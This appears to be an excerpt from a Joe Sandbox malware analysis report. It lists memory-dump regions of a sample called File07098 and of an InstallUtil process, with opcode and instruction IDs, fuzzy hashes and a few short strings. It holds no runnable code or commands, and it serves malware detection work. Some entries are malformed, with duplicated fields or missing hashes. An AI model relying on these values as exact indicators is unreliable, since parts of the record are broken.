                                                        • Opcode Fuzzy Hash: 092fd6d4a2bb2b62792a4de2d916378a348cb1bd429ee2b17e6412fdb8ba9f42
                                                        • Instruction Fuzzy Hash: 0BE0927190D285DFC712CBB4ACA545CBFF4AF42200B1082EED889D7253D5301E14EB92
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 582dfeb9b3cb507ddaf023be6bfd5373ce175d1aa554e246bd69b02e22b9790d
                                                        • Instruction ID: 91aebcb377d3a8e19c816cb6a9af0a1acf1fcfdbf4f8fd554b26ad12a4ee2f02
                                                        • Opcode Fuzzy Hash: 582dfeb9b3cb507ddaf023be6bfd5373ce175d1aa554e246bd69b02e22b9790d
                                                        • Instruction Fuzzy Hash: BCE0DF70A0A349EFCB41DFF4DE0169DBBF0EB85200B2006ABD488E3292DA354F019B91
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fe09bf23b5ee1239a963d0baa08d3636d86a64feeec60e5cb3a71373a9b26cda
                                                        • Instruction ID: 4281a18f34b0f15a758c79db5ec07c9ecc251e031fdef10e317eb054b6e4c45d
                                                        • Opcode Fuzzy Hash: fe09bf23b5ee1239a963d0baa08d3636d86a64feeec60e5cb3a71373a9b26cda
                                                        • Instruction Fuzzy Hash: 81E0ED74E05208EFC744DFA8D5806ACBBF4FB48304F10C5AAD85893340D671AA42DF40
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fe09bf23b5ee1239a963d0baa08d3636d86a64feeec60e5cb3a71373a9b26cda
                                                        • Instruction ID: 93628b0b3c0c43ad8ab5e7a64bdb31d3aaafae03378b0e3cf0855b2e2e23b512
                                                        • Opcode Fuzzy Hash: fe09bf23b5ee1239a963d0baa08d3636d86a64feeec60e5cb3a71373a9b26cda
                                                        • Instruction Fuzzy Hash: FAE0C274E05218EFCB84DFA8D6456ADBBF4EB48304F1080AAD81893340E631AA42DB80
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3ad6e90acead28793f984f8fd5813157a30475c2b87d376fc93795c6bdb0c2c7
                                                        • Instruction ID: 0306db49047a2fe109a2efd147e8ecff734ec6f0b256055ebb859939c9c93adf
                                                        • Opcode Fuzzy Hash: 3ad6e90acead28793f984f8fd5813157a30475c2b87d376fc93795c6bdb0c2c7
                                                        • Instruction Fuzzy Hash: FBE01AB4D09318EFCB54EFA8D644AADBBF5FB59300F1081A9E808A3310D7359A54EF80
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2078378369.0000000000A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a80000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f6989533d26198be4f5ea9ab2932bada35de3ede6e35c3417a7f4acca26533eb
                                                        • Instruction ID: fb73fd9aa4c2d7c508f24b7d9a0027438bbce951286910e47b0fcf843c1024e5
                                                        • Opcode Fuzzy Hash: f6989533d26198be4f5ea9ab2932bada35de3ede6e35c3417a7f4acca26533eb
                                                        • Instruction Fuzzy Hash: EEE0C230B14A05DFF714E779A80436673DBAB80300F18CC70E80C81854DA3998918710
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e0575d7a652df49ad40f090e1eae23898faf18a8eeb664160276817d4d99fe99
                                                        • Instruction ID: 3caff476978d351432fc47d36bbd1d79ee8f56f2bedd8b1844bcb7c602cf9d15
                                                        • Opcode Fuzzy Hash: e0575d7a652df49ad40f090e1eae23898faf18a8eeb664160276817d4d99fe99
                                                        • Instruction Fuzzy Hash: 50E08670A15118DFC744DFACC64169CBBF4EB08304F1080E9C80CD7340E631AE41DB40
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b92b8250a99b3425e2595004a54f1898ad11131aa1ad8a8ed24fccbae35365c6
                                                        • Instruction ID: eb549dd9d0f929138467381339aacf68c0b06d0cb41652d5bd383c5a40c96e2a
                                                        • Opcode Fuzzy Hash: b92b8250a99b3425e2595004a54f1898ad11131aa1ad8a8ed24fccbae35365c6
                                                        • Instruction Fuzzy Hash: 94F0FE74A05258CFDB54EF64D859B9CBBB5FF05304F5081A9E059A7744DB341980CF51
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2098461453.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6990000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fe0b46099fe997465953187ac7ffce7a9a684c4a0c5db50d126d730193fd4700
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2f6a29a996c847e30533ae8442380ddda7b70bedce27ebc013702a536619ae83
                                                        • Instruction ID: dd11299b1db036b5e9f3587f4172ac20357d687ec7178f54eea80d7229d2c31e
                                                        • Opcode Fuzzy Hash: 2f6a29a996c847e30533ae8442380ddda7b70bedce27ebc013702a536619ae83
                                                        • Instruction Fuzzy Hash: A9D0C978D04368CFCB10CF21D944789FBB2BB04304F0050D6E549A2240D77059808F01
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a4bd4e0d83214e1b11a134269dbe4246143a53591a603cd8d8590d7e47be87a5
                                                        • Instruction ID: 78678e3f1ed5c109183a4cd3d9d38c3e1300d71a1f613f23166a5d8bdc9ce4ae
                                                        • Opcode Fuzzy Hash: a4bd4e0d83214e1b11a134269dbe4246143a53591a603cd8d8590d7e47be87a5
                                                        • Instruction Fuzzy Hash: 60C08CB0310204CBD3046F60E1AA63E3AAADB42309F600016A0463AAC4CB342840CB52
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2078378369.0000000000A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a80000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3aac5aef85f49d25ccbd92899b513d32ae0818ad919ecc1e2708e3ea53e39312
                                                        • Instruction ID: ffcd9f1a241dcc6647d88b05e582f2c20eeda4d7ab0ec41761ab693b2eafd1f6
                                                        • Opcode Fuzzy Hash: 3aac5aef85f49d25ccbd92899b513d32ae0818ad919ecc1e2708e3ea53e39312
                                                        • Instruction Fuzzy Hash: 6D902230008A0CCB008023A03C0800EB30C8888030BC00000E00C000030A20A00080C0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2078378369.0000000000A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a80000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a1525bcbe1005fb1235deafdaf970dd408be3fcf5ac6f99d09d214aced01f69c
                                                        • Instruction ID: c2def147fecb2866dbaa3954599c4687da54258dd444c99376950d773072c054
                                                        • Opcode Fuzzy Hash: a1525bcbe1005fb1235deafdaf970dd408be3fcf5ac6f99d09d214aced01f69c
                                                        • Instruction Fuzzy Hash: 6EA00179918544AFD7549BE8E8CD259FAB0EB09761F204126A856D6352DA344440AB41
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (wq$,wq
                                                        • API String ID: 0-2981683845
                                                        • Opcode ID: 757a9a3114a69a705df0dde2f5a84bcb5aa3cefa9992fad739017ec1b61ed1b9
                                                        • Instruction ID: e96efed1c29727dabe0055744640e0d0d290ffc0be5a0773c3f4b0b3bf1ae012
                                                        • Opcode Fuzzy Hash: 757a9a3114a69a705df0dde2f5a84bcb5aa3cefa9992fad739017ec1b61ed1b9
                                                        • Instruction Fuzzy Hash: 81D13B34A00614CFDB14DF68C684A6AB7F2FF98318F25C959E805AB362DB34EC85DB50
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Tesq
                                                        • API String ID: 0-136783293
                                                        • Opcode ID: 19e7bb9ec2252b7b17eb8ad663103bcb0b2f1bcea8351180cbef7ba9bdfe638d
                                                        • Instruction ID: 88e9473fba033627d1529cbf166fdfdf9409cab30ed196cd33b1d06f28a1db34
                                                        • Opcode Fuzzy Hash: 19e7bb9ec2252b7b17eb8ad663103bcb0b2f1bcea8351180cbef7ba9bdfe638d
                                                        • Instruction Fuzzy Hash: 8FB1F770E05228CFDB24CF69D984B9DBBF2FB99304F14806AD459AB355D7B0A985CF00
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Tesq
                                                        • API String ID: 0-136783293
                                                        • Opcode ID: 4260deb3c2ecbc664ffef8572cfa6855960b9ea6991ce02f8202d26cdc185bd9
                                                        • Instruction ID: 9e425dc78f5a2826f5f14d14188efd6db58a683f6be238d824cdf47e5b532a13
                                                        • Opcode Fuzzy Hash: 4260deb3c2ecbc664ffef8572cfa6855960b9ea6991ce02f8202d26cdc185bd9
                                                        • Instruction Fuzzy Hash: 0BB1F674E05228CFDB24CF69D984B9DBBF2FB89304F1480AAD458AB355D7B0A985CF00
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: E
                                                        • API String ID: 0-3568589458
                                                        • Opcode ID: 768cf3ba1402c6dbc86fc6778b790ab1b34b20bff7e85a69195187e51f3b50d4
                                                        • Instruction ID: bd5c1be947905b815bdd43ee87ffbb66bee741788087fbd4efb2a37d02625dc6
                                                        • Opcode Fuzzy Hash: 768cf3ba1402c6dbc86fc6778b790ab1b34b20bff7e85a69195187e51f3b50d4
                                                        • Instruction Fuzzy Hash: CF514DB0E116288FDB60CFA8D9846CDBBF1BF48314F6481A9E558E7202D730A996CF05
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7a29fa19781676dc2f2013e430d5c882e2fcf908209c5037caeb7fe2be7cd6f2
                                                        • Instruction ID: 144a5c7bc4b101221e3dd66b5d41966520355212e8d8907d8224420d3873163d
                                                        • Opcode Fuzzy Hash: 7a29fa19781676dc2f2013e430d5c882e2fcf908209c5037caeb7fe2be7cd6f2
                                                        • Instruction Fuzzy Hash: 3F12B571E056288FDB14CFAAC98069EFBF2FF88304F24C569D459AB219D734A946CF50
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2098461453.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6990000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0449f97c516ab2576f29fe2ba7123a41a1d51eb4f75473664e2544e67df366de
                                                        • Instruction ID: 1d836cf4707f648e0acf6a560f1ebf22c4214846dc2abbfeb3ccd133d2677e3c
                                                        • Opcode Fuzzy Hash: 0449f97c516ab2576f29fe2ba7123a41a1d51eb4f75473664e2544e67df366de
                                                        • Instruction Fuzzy Hash: 8991F570D05328CFEBA4DFA9C8847ADBBF6BF49304F2084A9D419A7641DB744985DF81
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0d0aed3f126279c97701d7a270fbe5d66eb2e7b7d1df813687d72cbdf7a62bbb
                                                        • Instruction ID: 1d3789c659172142a160e8c459f4280970e8edbb71a76343fc6a0e75d7ed1edd
                                                        • Opcode Fuzzy Hash: 0d0aed3f126279c97701d7a270fbe5d66eb2e7b7d1df813687d72cbdf7a62bbb
                                                        • Instruction Fuzzy Hash: 8E917070E042688BDB54CFE9C98069EFBF2FF98304F248569D459EB209D734A94ACF50
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a85555613c8de2b0891910216da932e26fd997cea1b376349e75ef3e5d82e524
                                                        • Instruction ID: d9f52d8fc1a32f1a61a974057cbc7bef14ea43d5fa326e21ba26c228ec449e27
                                                        • Opcode Fuzzy Hash: a85555613c8de2b0891910216da932e26fd997cea1b376349e75ef3e5d82e524
                                                        • Instruction Fuzzy Hash: 6A814C71E042688FDB54CFE9C980A9DFBF1BF98304F248569D419EB219E334AA59CF40
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4cf83769cdcde0a97acd0c026e3e045e7aa7811a4b25cd37735ae3aaae7041c0
                                                        • Instruction ID: 07a9f32a5c0994328c8a41fbb322e5219606fbc6567852322c0d162f2eb6bea6
                                                        • Opcode Fuzzy Hash: 4cf83769cdcde0a97acd0c026e3e045e7aa7811a4b25cd37735ae3aaae7041c0
                                                        • Instruction Fuzzy Hash: 834148B1E016188BDB08CFABC94069EFBF3BFC8300F14C16AD958AB214EA3059468B54
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2078378369.0000000000A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a80000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a5036530a5f518bbf9783a0a1a6fa6224c880a2d5a47d2da6aa11b1a418c81ef
                                                        • Instruction ID: 93e7d3bf641250818b7f5c84fc62730af478c67ab296cb1636b68d1a67fdff58
                                                        • Opcode Fuzzy Hash: a5036530a5f518bbf9783a0a1a6fa6224c880a2d5a47d2da6aa11b1a418c81ef
                                                        • Instruction Fuzzy Hash: 7C5164B090520ACFDB28EF09E888BF9B7F2FB98314F1091A5D00AA6290D7758D81CF01
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2091458742.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d20000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a48421a8c37b042dea6ae2f7fc6adf9adc434713ec17371b113a3da90a817a5b
                                                        • Instruction ID: a99747a349bd060974392cdaefa3e0586aa7d83237e9c041e1fd5efdf01c4d70
                                                        • Opcode Fuzzy Hash: a48421a8c37b042dea6ae2f7fc6adf9adc434713ec17371b113a3da90a817a5b
                                                        • Instruction Fuzzy Hash: 12418171E05A589FEB1CCF6B8D4069AFAF3AFC9300F14C1BAD44CAA265EB3055468F11
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2078378369.0000000000A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a80000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 820e53048135205f72eff2d6eb4a82944eb0f9bc67f4a14e9ea744383518b742
                                                        • Instruction ID: c2c0b44d05cc14b82f49af64d7ce7993a804d577a74f69b1901c7830f1ebf085
                                                        • Opcode Fuzzy Hash: 820e53048135205f72eff2d6eb4a82944eb0f9bc67f4a14e9ea744383518b742
                                                        • Instruction Fuzzy Hash: 3D4114B0906615CFDB28EF09E8887B9BBF2FF98310F1485A9D149966A4D3B44DD1CF01
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2098461453.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6990000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 57c0ff7ea38e5754a90d3d3b952d498e1028a7e0b82fe12154846ccf7645bdb2
                                                        • Instruction ID: 1a75f39b7b4ec3660a281afdc2f11dc1eec7190ccb8206d0f2b4b588b3e5d58d
                                                        • Opcode Fuzzy Hash: 57c0ff7ea38e5754a90d3d3b952d498e1028a7e0b82fe12154846ccf7645bdb2
                                                        • Instruction Fuzzy Hash: B9312D71D097558FEB69CF2A8C4429ABBF7AFC6200F04C0FAD45CAA265DB340A85CF11
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2098461453.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6990000_File07098.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5bf69dc907d39ddd129a58b506b67854323eccffd060b293e581b2a852fbf1c2
                                                        • Instruction ID: 0ae8c5730c6b73b7bb0c49126a3ad94d93e0954f0e6df6a37bf5f010ffc3a75c
                                                        • Opcode Fuzzy Hash: 5bf69dc907d39ddd129a58b506b67854323eccffd060b293e581b2a852fbf1c2
                                                        • Instruction Fuzzy Hash: A921A771D096298BEB68CF1B984429AF6F7AFC9204F04C4BA951CA6614DB740A858F51
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (osq$(osq$(osq$,wq$,wq
                                                        • API String ID: 0-1903262254
                                                        • Opcode ID: 6e8529ab5610815addddfae106907fdaf55e45125eabd6380e8a79447e3099d7
                                                        • Instruction ID: 054ed1fd84cb826fccf0e3577defea3633d3d5f36def8eeb703960b2ba575093
                                                        • Opcode Fuzzy Hash: 6e8529ab5610815addddfae106907fdaf55e45125eabd6380e8a79447e3099d7
                                                        • Instruction Fuzzy Hash: 84127F70E1060ADFEB15CFA9C988AAEBBB6FF88340F158469E505AB261D730DD41CF50
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
                                                        • API String ID: 0-1434930255
                                                        • Opcode ID: b4cecc90e8931c14e188cb4fb0d1fe5e5796b46c207d9a93ec4827a0aa46a22c
                                                        • Instruction ID: e9d4ecf810b46f2d4023edb62608a03340330c16db46c720a6a84eef55dac197
                                                        • Opcode Fuzzy Hash: b4cecc90e8931c14e188cb4fb0d1fe5e5796b46c207d9a93ec4827a0aa46a22c
                                                        • Instruction Fuzzy Hash: 47E1F975E10259CFDB14CFA9D994A9EBBB1FF49310F1580A9E909AB361DB30E881CF50
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
                                                        • API String ID: 0-1434930255
                                                        • Opcode ID: 630a70b4f693abbe42677aebdf7b6d6c3e133e2aa79ff320cd0a26bb4aff4071
                                                        • Instruction ID: fd8f45466c76cc73cc222190e96b4bb2e0ec35eca4a8ff875e4f08051184a306
                                                        • Opcode Fuzzy Hash: 630a70b4f693abbe42677aebdf7b6d6c3e133e2aa79ff320cd0a26bb4aff4071
                                                        • Instruction Fuzzy Hash: 6591C574E10218CFDB14DFAAD984A9EBBF2BF89300F149069E509AB365DB319941DF11
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
                                                        • API String ID: 0-1434930255
                                                        • Opcode ID: 5ccd302be4ef0f82f1f9c9e030b81992839b88bcedd00c2208a34187bcfff6d0
                                                        • Instruction ID: cec4fa52d8694785bce569369d121ff6ca07c02cf92dc61a3ca78d9c4f51a845
                                                        • Opcode Fuzzy Hash: 5ccd302be4ef0f82f1f9c9e030b81992839b88bcedd00c2208a34187bcfff6d0
                                                        • Instruction Fuzzy Hash: 0A91B474E14218DFDB14DFAAD984A9EBBF2BF89300F14C069E459AB365DB309941DF10
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PHsq$PHsq
                                                        • API String ID: 0-3507005907
                                                        • Opcode ID: f98e25589d1f6a5a58198649a3e6c8bbcbacc74ef6a68940c95e819b87595879
                                                        • Instruction ID: 6018ff96aff7e505fe437dedeae9d07ac92a35f98ec91e8408ceca16baf99aeb
                                                        • Opcode Fuzzy Hash: f98e25589d1f6a5a58198649a3e6c8bbcbacc74ef6a68940c95e819b87595879
                                                        • Instruction Fuzzy Hash: 0181C1B0E00218CFDB58DFAAD984BDDBBB2BF89300F24816AD419AB354DB345946CF40
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c2b750339ed391608e60077aefb7541d4c06cc57f79a64067c1e1221566414a9
                                                        • Instruction ID: 149088ea0ebd41ff07866a49e99b4021f190e9c2e02147d5698e01cf2a86a592
                                                        • Opcode Fuzzy Hash: c2b750339ed391608e60077aefb7541d4c06cc57f79a64067c1e1221566414a9
                                                        • Instruction Fuzzy Hash: 67828E74E012289FDB64DF69CC94BDDBBB2BB89300F1481EA950DA7265DB315E81CF41
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fbafa46eaff8d4a669cfc043bc973b502341166615dde49e62dc25a1b5bcd83e
                                                        • Instruction ID: d47c965070642bae1a84b5193d3b9d6688f9178e80198fe511e5fd9ba9b23bfe
                                                        • Opcode Fuzzy Hash: fbafa46eaff8d4a669cfc043bc973b502341166615dde49e62dc25a1b5bcd83e
                                                        • Instruction Fuzzy Hash: 6A72D074E152298FDB64DF69C990BEABBB2BB49300F1491E9D418A7355E7309EC1CF40
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 321c18d260ac0d79f821b050ab5356ea528fbe7105f5ee6949b29719e990e318
                                                        • Instruction ID: 0b5f5682195d87ed1acbf847e9adadea71769a9adb046c85abf7e93319a73f87
                                                        • Opcode Fuzzy Hash: 321c18d260ac0d79f821b050ab5356ea528fbe7105f5ee6949b29719e990e318
                                                        • Instruction Fuzzy Hash: F3729C74E012289FDB65DF69CD94BDEBBB2BB89300F1480E9A50DA7264DB315E81CF41
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 70bf137caa7565ff2d87d6bb9aa0347cb2ad04b1cbe5b909be6f5e4928039f00
                                                        • Instruction ID: 668239ab3265b7222274353d9196de184f42530c537d4f1751e0e3b36e6ed073
                                                        • Opcode Fuzzy Hash: 70bf137caa7565ff2d87d6bb9aa0347cb2ad04b1cbe5b909be6f5e4928039f00
                                                        • Instruction Fuzzy Hash: 69E1C4B4E01218CFEB54DFA5D984B9DBBB2BF49304F2081AAD408AB394DB355E85CF51
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
